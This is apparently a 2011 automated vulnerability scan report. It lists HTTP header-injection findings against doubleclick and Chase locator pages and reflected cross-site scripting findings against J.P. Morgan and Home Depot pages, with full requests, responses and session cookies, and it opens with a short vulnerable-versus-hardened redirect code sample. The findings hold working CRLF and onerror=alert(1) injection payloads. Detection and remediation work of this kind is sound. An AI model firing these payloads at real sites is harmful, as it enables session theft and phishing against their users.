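    """Everything after the first blank line, i.e. what the receiver treats as body."""
    return response.split(b"\r\n\r\n", 1)[1]


if __name__ == "__main__":
    print(header_names(build_redirect_vulnerable(PAYLOAD_2_1)))
    print(header_names(build_redirect_vulnerable(SPLIT_PAYLOAD)))
    print(response_body(build_redirect_vulnerable(SPLIT_PAYLOAD))[:25])
    print(hardened_accepts(PAYLOAD_2_1), hardened_accepts("getcamphist"))
```

With PAYLOAD_2_1 the vulnerable builder yields a response in which the receiver sees a third header named ae875a6483a, exactly the shape of the Location headers in findings 2.1 to 2.5; with SPLIT_PAYLOAD the receiver sees a Content-Length of 25 followed by a 25-byte script body, and the server's own Content-Type header is pushed into the body. The hardened builder refuses both because the decoded value contains CR and LF. Rejecting rather than stripping is deliberate: a stripped value is still attacker-chosen, and the application has no legitimate reason to redirect to a control character.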


2.1. http://ad.doubleclick.net/getcamphist [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /getcamphist

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8ca46%0d%0aae875a6483a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8ca46%0d%0aae875a6483a;src=1513429;host=metrics.apple.com%2Fb%2Fss%2Fappleglobal%2Cappleitunes%2Cappleusitunesipod%2F1%2FH.22.1%2Fs11845888246316%3FAQB%3D1%26vvpr%3Dtrue%26%26ndh%3D1%26t%3D12%252F6%252F2011%252012%253A59%253A8%25202%2520300%26pageName%3Ditunes%2520-%2520index%2520%28us%29%26g%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252F%26cc%3DUSD%26vvp%3DDFA%25231513429%253Av46%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dwww.us.itunes%26c1%3Dmusic%2520-%2520sep%25202010%2520%28us%29%26c4%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252F%26c5%3Dwin32%26c6%3DD%253D%2522%253A%2520%2522%252BpageName%26c9%3Dwindows%26c12%3Dno%2520itunes%26c15%3Dno%2520zip%26c18%3Dno%2520quicktime%26c19%3Dflash%252010%26c20%3Dnon-store%2520kiosk%26c25%3Dother%2520nav%2520or%2520none%26c44%3Dappleglobal%252Cappleitunes%252Cappleusitunesipod%26c48%3D1%26c49%3DD%253Ds_vi%26c50%3Ditunes%253D3%26s%3D1920x1200%26c%3D32%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1065%26bh%3D823%26p%3DShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.260.3%253BJava%28TM%29%2520Platform%2520SE%25206%2520U26%253BChrome%2520PDF%2520Viewer%253BGoogle%2520Gears%25200.5.33.0%253BWPI%2520Detector%25201.3%253BGoogle%2520Update%253BDefault%2520Plug-in%253B%26AQE%3D1&A2S=1;ord=22175180 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8ca46
ae875a6483a
;src=1513429;host=metrics.apple.com/b/ss/appleglobal,appleitunes,appleusitunesipod/1/H.22.1/s11845888246316:
Date: Tue, 12 Jul 2011 17:59:33 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/getcamphist [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /getcamphist

Issue detail

The value of the src request parameter is copied into the Location response header. The payload d4dd7%0d%0a1d25cb0b3ad was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /getcamphist;src=1513429;host=metrics.apple.com%2Fb%2Fss%2Fappleglobal%2Cappleitunes%2Cappleusitunesipod%2F1%2FH.22.1%2Fs11845888246316%3FAQB%3D1%26vvpr%3Dtrue%26%26ndh%3D1%26t%3D12%252F6%252F2011%252012%253A59%253A8%25202%2520300%26pageName%3Ditunes%2520-%2520index%2520%28us%29%26g%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252F%26cc%3DUSD%26vvp%3DDFA%25231513429%253Av46%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dwww.us.itunes%26c1%3Dmusic%2520-%2520sep%25202010%2520%28us%29%26c4%3Dhttp%253A%252F%252Fwww.apple.com%252Fitunes%252F%26c5%3Dwin32%26c6%3DD%253D%2522%253A%2520%2522%252BpageName%26c9%3Dwindows%26c12%3Dno%2520itunes%26c15%3Dno%2520zip%26c18%3Dno%2520quicktime%26c19%3Dflash%252010%26c20%3Dnon-store%2520kiosk%26c25%3Dother%2520nav%2520or%2520none%26c44%3Dappleglobal%252Cappleitunes%252Cappleusitunesipod%26c48%3D1%26c49%3DD%253Ds_vi%26c50%3Ditunes%253D3%26s%3D1920x1200%26c%3D32%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1065%26bh%3D823%26p%3DShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.260.3%253BJava%28TM%29%2520Platform%2520SE%25206%2520U26%253BChrome%2520PDF%2520Viewer%253BGoogle%2520Gears%25200.5.33.0%253BWPI%2520Detector%25201.3%253BGoogle%2520Update%253BDefault%2520Plug-in%253B%26AQE%3D1d4dd7%0d%0a1d25cb0b3ad&A2S=1;ord=22175180 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.apple.com/itunes/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://metrics.apple.com/b/ss/appleglobal,appleitunes,appleusitunesipod/1/H.22.1/s11845888246316?AQB=1&vvpr=true&&ndh=1&t=12%2F6%2F2011%2012%3A59%3A8%202%20300&pageName=itunes%20-%20index%20(us)&g=http%3A%2F%2Fwww.apple.com%2Fitunes%2F&cc=USD&vvp=DFA%231513429%3Av46%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=www.us.itunes&c1=music%20-%20sep%202010%20(us)&c4=http%3A%2F%2Fwww.apple.com%2Fitunes%2F&c5=win32&c6=D%3D%22%3A%20%22%2BpageName&c9=windows&c12=no%20itunes&c15=no%20zip&c18=no%20quicktime&c19=flash%2010&c20=non-store%20kiosk&c25=other%20nav%20or%20none&c44=appleglobal%2Cappleitunes%2Cappleusitunesipod&c48=1&c49=D%3Ds_vi&c50=itunes%3D3&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=823&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1d4dd7
1d25cb0b3ad
&A2S=1/respcamphist;src=1513429;ec=nh;rch=2;lastimp=0;lastimptime=0;lis=0;lip=0;lic=0;lir=0;lirv=0;likv=0;lipn=;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1310493572:
Date: Tue, 12 Jul 2011 17:59:32 GMT
Server: GFE/2.0
Content-Type: text/html


2.3. https://locator.chase.com/LocatorAction.do [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://locator.chase.com
Path:   /LocatorAction.do

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 22ef1%0d%0a7769e8f9510 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /22ef1%0d%0a7769e8f9510;jsessionid=C68735D6F1D6CA832EF05597DC582089.ftc-web4 HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 12 Jul 2011 16:09:43 GMT
Server: Apache
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Location: /22ef1
7769e8f9510
;jsessionid=C68735D6F1D6CA832EF05597DC582089.ftc-web4
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain


2.4. https://locator.chase.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://locator.chase.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7b17c%0d%0ac7e1c72fd84 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7b17c%0d%0ac7e1c72fd84 HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=8EEB941FE1274DFCE21BE8CFDBAF22F9.ftc-web1

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 12 Jul 2011 16:09:52 GMT
Server: Apache
Set-Cookie: JSESSIONID=3E400342F5CBBAA525EA57380B24E1E9.ftc-web3; Path=/; Secure
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Location: /7b17c
c7e1c72fd84
;jsessionid=3E400342F5CBBAA525EA57380B24E1E9.ftc-web3
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain


2.5. https://locator.chase.com/jsp/SearchPage.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://locator.chase.com
Path:   /jsp/SearchPage.jsp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 64242%0d%0a98bbc6ba98b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /64242%0d%0a98bbc6ba98b/SearchPage.jsp HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=23ECC4A4BD991387CE19963C8C5BA577.ftc-web4

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 12 Jul 2011 16:10:31 GMT
Server: Apache
Set-Cookie: JSESSIONID=BD669E70F19B7B9016BF9ACB421F449B.ftc-web4; Path=/; Secure
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Location: /64242
98bbc6ba98b
/SearchPage.jsp;jsessionid=BD669E70F19B7B9016BF9ACB421F449B.ftc-web4
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain


3. Cross-site scripting (reflected)
There are 36 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. https://access.jpmorgan.com/appmanager/jpmalogonportal/jpmalogonhome [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   https://access.jpmorgan.com
Path:   /appmanager/jpmalogonportal/jpmalogonhome

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 1ad44(a)706815c84f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /appmanager/jpmalogonportal1ad44(a)706815c84f/jpmalogonhome?TYPE=33554433&REALMOID=06-fffbf770-11bc-1000-8bb3-832aeae60cb3&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=jpmawbp&TARGET=$SM$https%3a%2f%2ftssportal%2ejpmorgan%2ecom%2fpp%2fpp%2fWSQ%2fservlet%2fappmanager%2fjpmaportal%2fjpmahome&brand=jpma HTTP/1.1
Host: access.jpmorgan.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma

Response

HTTP/1.1 404 Not Found
Date: Tue, 12 Jul 2011 16:31:12 GMT
Server: Apache
Content-Length: 96
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Resource /jpmalogonportal1ad44(a)706815c84f/jpmalogonhome could not be resolved for locale null.

3.2. https://access.jpmorgan.com/appmanager/jpmalogonportal/jpmalogonhome [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   https://access.jpmorgan.com
Path:   /appmanager/jpmalogonportal/jpmalogonhome

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9fa1a(a)6d1551bfcb1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /appmanager/jpmalogonportal/jpmalogonhome9fa1a(a)6d1551bfcb1?TYPE=33554433&REALMOID=06-fffbf770-11bc-1000-8bb3-832aeae60cb3&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=jpmawbp&TARGET=$SM$https%3a%2f%2ftssportal%2ejpmorgan%2ecom%2fpp%2fpp%2fWSQ%2fservlet%2fappmanager%2fjpmaportal%2fjpmahome&brand=jpma HTTP/1.1
Host: access.jpmorgan.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma

Response

HTTP/1.1 404 Not Found
Date: Tue, 12 Jul 2011 16:31:18 GMT
Server: Apache
Content-Length: 97
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

Resource /jpmalogonportal/jpmalogonhome9fa1a(a)6d1551bfcb1 could not be resolved for locale null.

3.3. https://access.jpmorgan.com/appmanager/jpmalogonportal/jpmalogonhome [TARGET parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://access.jpmorgan.com
Path:   /appmanager/jpmalogonportal/jpmalogonhome

Issue detail

The value of the TARGET request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f722"%20a%3db%20200316abca was submitted in the TARGET parameter. This input was echoed as 9f722" a=b 200316abca in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /appmanager/jpmalogonportal/jpmalogonhome?TYPE=33554433&REALMOID=06-fffbf770-11bc-1000-8bb3-832aeae60cb3&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=jpmawbp&TARGET=$SM$https%3a%2f%2ftssportal%2ejpmorgan%2ecom%2fpp%2fpp%2fWSQ%2fservlet%2fappmanager%2fjpmaportal%2fjpmahome9f722"%20a%3db%20200316abca&brand=jpma HTTP/1.1
Host: access.jpmorgan.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:31:00 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome9f722" a=b 200316abca; domain=.jpmorgan.com; path=/; secure
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 34403


<html>


   <head>


<title>J.P. Morgan ACCESS</title><link rel="stylesheet" href="/framework/skins/jpmaskin/r3/css/jpmalogon.css" type="text/css"><link type="image/x-icon" rel="shortcut ic
...[SNIP]...
<input type="hidden" name="target" value="https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome9f722" a=b 200316abca"/>
...[SNIP]...

3.4. http://community.homedepot.com/restapi/vc/boards/id/Maintenance [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.homedepot.com
Path:   /restapi/vc/boards/id/Maintenance

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e6afc<img%20src%3da%20onerror%3dalert(1)>81e5cad2eb0 was submitted in the callback parameter. This input was echoed as e6afc<img src=a onerror=alert(1)>81e5cad2eb0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restapi/vc/boards/id/Maintenance?xslt=json.xsl&callback=jsonp1310488529624e6afc<img%20src%3da%20onerror%3dalert(1)>81e5cad2eb0 HTTP/1.1
Host: community.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FCF442851D317F-4000010680023189[CE]; 40M3=3Qym2Nw8SPgeWsRL3W1Fo9bIc5fAog7Qw8GtDUzcMgFyqP-BqANMzbg; RES_TRACKINGID=345519762253388; THD_CACHE_NAV_PERSIST=C10%7e96%5f%7eC10%5fEXP%7e; WC_PERSISTENT=JOV9mEDH97qHDqOENJ2a%2foByFXM%3d%0a%3b2011%2d06%2d16+08%3a16%3a48%2e923%5f1308225529140%2d4164%5f10051%5f287408220%2c%2d1%2cUSD%5f10051; THD_PERSIST=C4%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC4%5fEXP%3d1360065529%3a%3bC5%3d7000000000002025830%3a%3bC5%5fEXP%3d1360065529%3a%3bC24%3d20018%3a%3bC24%5fEXP%3d1360065529%3a%3bC25%3dccaita7t%2fWC%5fTHD2%5fccaita7t%2f1310488436587%3a%3bC25%5fEXP%3d1362328436%3a%3bC27%3d2583%2bNE%20Washington%20DC%20%2d%20%20Washington%2c%20DC%2b43%3a%3bC27%5fEXP%3d1360065529%3a%3bC33%3d2583%3a%3bC33%5fEXP%3d1360065529; THD_CACHE_NAV_SESSION=C20%7e8119%5f%7eC20%5fEXP%7e%5f%7eC22%7e2583%5f%7eC22%5fEXP%7e; THD_SESSION=C6%3D%7B%22I1%22%3A%220%22%2C%22F1%22%3A%22true%22%2C%22F2%22%3A%22false%22%2C%22D1%22%3A%22%240.00%22%2C%22D2%22%3A%22%24249.00%22%7D%3A%3BC6_EXP%3D-1%3A%3BC34%3D1.0-2.1-3.0-4.0-5.0%3A%3BC34_EXP%3D-1; s_pers=%20s_campaign%3Dno%2520value%7C1310490339841%3B%20s_prevPage%3Dhomepage%7C1310490339843%3B%20p_30%3DHome%2520Page%7C1310490339844%3B; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_cmpnm%3Dundefined%3B%20s_sq%3D%3B; RES_SESSIONID=877035136567428; ResonanceSegment=1; FSRCookie=ForeseeLoyalty=1; VISITORID=910187893

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:34:35 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Content-Length: 653
Connection: close
Content-Type: application/json;charset=UTF-8

jsonp1310488529624e6afc<img src=a onerror=alert(1)>81e5cad2eb0({"response":{"status":"success","board":{"type":"board","href":"\/boards\/id\/Maintenance","id":{"type":"string","$":"Maintenance"},"owner":{"type":"user","null":"true"},"interaction_style":{"type":"s
...[SNIP]...

3.5. http://community.homedepot.com/restapi/vc/boards/id/build [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.homedepot.com
Path:   /restapi/vc/boards/id/build

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 8d1a9<img%20src%3da%20onerror%3dalert(1)>02e074b4b25 was submitted in the callback parameter. This input was echoed as 8d1a9<img src=a onerror=alert(1)>02e074b4b25 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /restapi/vc/boards/id/build?xslt=json.xsl&callback=jsonp13104885296198d1a9<img%20src%3da%20onerror%3dalert(1)>02e074b4b25 HTTP/1.1
Host: community.homedepot.com
Proxy-Connection: keep-alive
Referer: http://www.homedepot.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
